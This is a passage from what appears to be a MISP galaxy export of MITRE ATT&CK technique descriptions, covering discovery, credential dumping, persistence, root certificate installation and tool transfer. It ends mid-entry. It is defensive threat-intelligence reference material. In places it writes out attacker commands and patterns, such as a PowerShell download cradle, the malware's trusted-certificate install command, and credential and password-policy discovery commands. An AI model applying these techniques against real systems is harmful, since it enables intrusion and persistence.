Identify business processes/tempo - T1280

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1280).

Understanding an organization's business processes and tempo may allow an adversary to more effectively craft social engineering attempts or to better hide technical actions, such as those that generate network traffic. (Citation: Scasny2015) (Citation: Infosec-osint)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business processes/tempo - T1280"

Table 5770. Table References

Links

https://attack.mitre.org/techniques/T1280

System Owner/User Discovery - T1033

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>show users</code> and <code>show ssh</code> can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033"

Table 5771. Table References

Links

https://attack.mitre.org/techniques/T1033

https://us-cert.cisa.gov/ncas/alerts/TA18-106A

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html

Disguise Root/Jailbreak Indicators - T1408

An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).

The tag is: misp-galaxy:mitre-attack-pattern="Disguise Root/Jailbreak Indicators - T1408"

Table 5772. Table References

Links

http://pages.cs.wisc.edu/vrastogi/static/papers/rcj13b.pdf

http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions

https://attack.mitre.org/techniques/T1408

https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html

Obtain templates/branding materials - T1281

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1281).

Templates and branding materials may be used by an adversary to add authenticity to social engineering message. (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain templates/branding materials - T1281"

Table 5773. Table References

Links

https://attack.mitre.org/techniques/T1281

Research relevant vulnerabilities/CVEs - T1291

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1291).

Common Vulnerabilities and Exposures (CVE) is a dictionary of publicly known information about security vulnerabilities and exposures. An adversary can use this information to target specific software that may be vulnerable. (Citation: WeaponsVulnerable) (Citation: KasperskyCarbanak)

The tag is: misp-galaxy:mitre-attack-pattern="Research relevant vulnerabilities/CVEs - T1291"

Table 5774. Table References

Links

https://attack.mitre.org/techniques/T1291

https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/

Conduct cost/benefit analysis - T1226

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1226).

Leadership conducts a cost/benefit analysis that generates a compelling need for information gathering which triggers a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). For example, an adversary compares the cost of cyber intrusions with the expected benefits from increased intelligence collection on cyber adversaries. (Citation: LowenthalCh4) (Citation: KIT-Herring)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct cost/benefit analysis - T1226"

Table 5775. Table References

Links

https://attack.mitre.org/techniques/T1226

Assess KITs/KIQs benefits - T1229

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1229).

Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) may be further subdivided to focus on political, economic, diplomatic, military, financial, or intellectual property categories. An adversary may specify KITs or KIQs in this manner in order to understand how the information they are pursuing can have multiple uses and to consider all aspects of the types of information they need to target for a particular purpose. (Citation: CompetitiveIntelligence) (Citation: CompetitiveIntelligence KIT)

The tag is: misp-galaxy:mitre-attack-pattern="Assess KITs/KIQs benefits - T1229"

Table 5776. Table References

Links

https://attack.mitre.org/techniques/T1229

Determine approach/attack vector - T1245

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1245).

The approach or attack vector outlines the specifics behind how the adversary would like to attack the target. As additional information is known through the other phases of PRE-ATT&CK, an adversary may update the approach or attack vector. (Citation: CyberAdversaryBehavior) (Citation: WITCHCOVEN2015) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine approach/attack vector - T1245"

Table 5777. Table References

Links

https://attack.mitre.org/techniques/T1245

Mine technical blogs/forums - T1257

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1257).

Technical blogs and forums provide a way for technical staff to ask for assistance or troubleshoot problems. In doing so they may reveal information such as operating system (OS), network devices, or applications in use. (Citation: FunAndSun2012)

The tag is: misp-galaxy:mitre-attack-pattern="Mine technical blogs/forums - T1257"

Table 5778. Table References

Links

https://attack.mitre.org/techniques/T1257

Unused/Unsupported Cloud Regions - T1535

Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.

Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.

A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.

An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)

The tag is: misp-galaxy:mitre-attack-pattern="Unused/Unsupported Cloud Regions - T1535"

Table 5779. Table References

Links

https://attack.mitre.org/techniques/T1535

https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc

Search Open Websites/Domains - T1593

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, news sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)

Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Open Websites/Domains - T1593"

Table 5780. Table References

Links

https://attack.mitre.org/techniques/T1593

https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e

https://securitytrails.com/blog/google-hacking-techniques

https://www.exploit-db.com/google-hacking-database

Obtain booter/stressor subscription - T1396

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1396).

Configure and setup booter/stressor services, often intended for server stress testing, to enable denial of service attacks. (Citation: Krebs-Anna) (Citation: Krebs-Booter) (Citation: Krebs-Bazaar)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain booter/stressor subscription - T1396"

Table 5781. Table References

Links

https://attack.mitre.org/techniques/T1396

https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/

https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/

https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/

Application Window Discovery - T1010

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used to identify potential data to collect as well as to identify security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)

Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.

The tag is: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010"

Table 5782. Table References

Links

https://attack.mitre.org/techniques/T1010

https://www.prevailion.com/darkwatchman-new-fileless-techniques/

https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/

OS Credential Dumping - T1003

Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

The tag is: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"

Table 5783. Table References

Links

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

https://adsecurity.org/?p=1729

https://attack.mitre.org/techniques/T1003

https://github.com/mattifestation/PowerSploit

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

https://msdn.microsoft.com/library/cc228086.aspx

https://msdn.microsoft.com/library/cc237008.aspx

https://msdn.microsoft.com/library/cc245496.aspx

https://msdn.microsoft.com/library/dd207691.aspx

https://wiki.samba.org/index.php/DRSUAPI

Winlogon Helper DLL - T1004

Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)

  • Winlogon\Notify - points to notification package DLLs that handle Winlogon events

  • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on

  • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004"

Table 5784. Table References

Links

https://attack.mitre.org/techniques/T1004

https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order

https://capec.mitre.org/data/definitions/579.html

https://technet.microsoft.com/en-us/sysinternals/bb963902

Modify System Partition - T1400

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.

Many Android devices provide the ability to unlock the bootloader for development purposes. An unlocked bootloader may provide the ability for an adversary to modify the system partition. Even if the bootloader is locked, it may be possible for an adversary to escalate privileges and then modify the system partition.

The tag is: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400"

Table 5785. Table References

Links

https://attack.mitre.org/techniques/T1400

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://source.android.com/security/verifiedboot/

https://www.apple.com/business/docs/iOS_Security_Guide.pdf

Compile After Delivery - T1500

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution, typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

The tag is: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1500"

Table 5786. Table References

Links

https://attack.mitre.org/techniques/T1500

https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

Direct Volume Access - T1006

Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)

Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as vssadmin, wbadmin, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)

The tag is: misp-galaxy:mitre-attack-pattern="Direct Volume Access - T1006"

Table 5787. Table References

Links

http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin

https://attack.mitre.org/techniques/T1006

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

https://lolbas-project.github.io/lolbas/Binaries/Esentutl/

System Service Discovery - T1007

Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.

Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007"

Table 5788. Table References

Links

https://attack.mitre.org/techniques/T1007

Taint Shared Content - T1080

Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary’s code on a remote system. Adversaries may use tainted shared content to move laterally.

A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user’s expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)

Adversaries may also compromise shared network directories through binary infections by appending or prepending their code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.

The tag is: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080"

Table 5789. Table References

Links

https://attack.mitre.org/techniques/T1080

https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html

Security Support Provider - T1101

Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1101"

Table 5790. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1101

https://technet.microsoft.com/en-us/library/dn408187.aspx

Peripheral Device Discovery - T1120

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.

The tag is: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"

Table 5791. Table References

Links

https://attack.mitre.org/techniques/T1120

https://linuxhint.com/list-usb-devices-linux/

https://ss64.com/osx/system_profiler.html

Password Policy Discovery - T1201

Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adhere to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking more than 3-4 passwords per account if the lockout is set to 6, so as not to lock out accounts).

Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code> (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. <code>show aaa</code>, <code>show aaa common-criteria policy all</code>).(Citation: US-CERT-TA18-106A)

Password policies can be discovered in cloud environments using available APIs such as <code>GetAccountPasswordPolicy</code> in AWS (Citation: AWS GetPasswordPolicy).

The tag is: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201"

Table 5792. Table References

Links

https://attack.mitre.org/techniques/T1201

https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html

https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu

https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines

https://www.us-cert.gov/ncas/alerts/TA18-106A

Analyze business processes - T1301

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1301).

Business processes, such as who typically communicates with who, or what the supply chain is for a particular part, provide opportunities for social engineering or other (Citation: Warwick2015)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze business processes - T1301"

Table 5793. Table References

Links

https://attack.mitre.org/techniques/T1301

Install Root Certificate - T1130

Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root’s chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted, an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)

In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130"

Table 5794. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

https://attack.mitre.org/techniques/T1130

https://capec.mitre.org/data/definitions/479.html

https://docs.microsoft.com/sysinternals/downloads/sigcheck

https://en.wikipedia.org/wiki/Root_certificate

https://objective-see.com/blog/blog_0x26.html

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/

https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/

Modify Existing Service - T1031

Windows service configuration information, including the file path to the service’s executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).

Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031"

Table 5795. Table References

Links

https://attack.mitre.org/techniques/T1031

https://capec.mitre.org/data/definitions/551.html

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662(v=ws.11)

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://twitter.com/r0wdy_/status/936365549553991680

Device Administrator Permissions - T1401

Adversaries may request device administrator permissions to perform malicious actions.

By abusing the device administration API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Device Lockout](https://attack.mitre.org/techniques/T1446), factory resetting the device to [Delete Device Data](https://attack.mitre.org/techniques/T1447) and any traces of the malware, disabling all of the device’s cameras, or making it more difficult to uninstall the app.(Citation: Android DeviceAdminInfo)

Device administrators must be approved by the user at runtime, with a system popup showing which of the actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.

The tag is: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401"

Table 5796. Table References

Links

https://attack.mitre.org/techniques/T1401

https://developer.android.com/reference/android/app/admin/DeviceAdminInfo

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

Ingress Tool Transfer - T1105

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).

On Windows, adversaries may use various utilities to download tools, such as copy, finger, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas)

Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.

Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service’s web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim’s machine.(Citation: Dropbox Malware Sync)

The tag is: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"

Table 5797. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1105

https://lolbas-project.github.io/#t1105

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf

https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/

Graphical User Interface - T1061

This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.

The Graphical User Interface (GUI) is a common way to interact with an operating system. Adversaries may use a system’s GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.

The tag is: misp-galaxy:mitre-attack-pattern="Graphical User Interface - T1061"

Table 5798. Table References

Links

https://attack.mitre.org/techniques/T1061

https://en.wikipedia.org/wiki/Run_command

Modify System Image - T1601

Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.

To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.

The tag is: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601"

Table 5799. Table References

Links

https://attack.mitre.org/techniques/T1601

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

Application Deployment Software - T1017

Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.

Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The tag is: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017"

Table 5800. Table References

Links

https://attack.mitre.org/techniques/T1017

https://capec.mitre.org/data/definitions/187.html

Application Layer Protocol - T1071

Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

The tag is: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071"

Table 5801. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071

Credentials in Files - T1081

Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)

In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)

The tag is: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081"

Table 5802. Table References

Links

http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx

http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html

https://attack.mitre.org/techniques/T1081

https://capec.mitre.org/data/definitions/639.html

https://posts.specterops.io/head-in-the-clouds-bd038bb69e48

Remote System Discovery - T1018

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).

